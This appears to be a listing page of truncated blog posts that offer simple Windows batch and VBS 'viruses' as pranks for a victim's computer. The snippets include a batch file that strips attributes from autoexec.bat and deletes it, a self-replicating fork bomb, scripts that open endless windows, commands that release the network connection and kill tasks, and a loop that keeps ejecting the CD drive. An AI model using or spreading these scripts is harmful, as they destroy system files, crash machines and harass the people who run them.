DONT’T TRY THIS ON YOUR OWN PC. USE IT AT YOUR OWN RISK This is the most simplest and deadliest trick/hack for your windows computer . Copy the following code into your notepad. @echo offattrib -r -s -h c:\autoexec.batdel c:\autoexec.batattrib -r -s…
Another deadly virus – Open Infinite Windows – Virus
So here is another such trick and this could be a headache. Again: DON,T TRY THIS IN YOUR OWN PC, USE IT AT YOUR OWN RISK Copy the following code in a notepad and save the file with extension .bat or .cmd:Astart notepad.exestart mspaint.exestart cal…

Create e-bomb – A Virus
Ebomb is simple attack that enables multiple applications in victims pc just to harass him. If you have seen movie die hard4 then you must be familiar with this. Although there are many ways to ebomb but this is the most easiest way to do it. Simply…
Cmd Bomb Virus
big things happens with small things best example just type this code in notepad, save the file as anything.bat and execute it see the magic…..n number of cmd opens and hangs after 1 minute..start %0 %0…
Simple bat viruses
Just type any of the following commands in notepad and save the file as anything.bat….1. To cut the internet connectionipconfig /release2. To kill any tasktaskkill /IM notepad.exeNote: U can any task in the processes and make this effective using lo…
Continuously Eject CD/DVD Drive – Harmless Notepad Virus
Just copy and paste the code given below in notepad and save it as xyz.vbs and execute the file.Set oWMP = CreateObject(“WMPlayer.OCX.7″) Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count – 1 colCDROMs…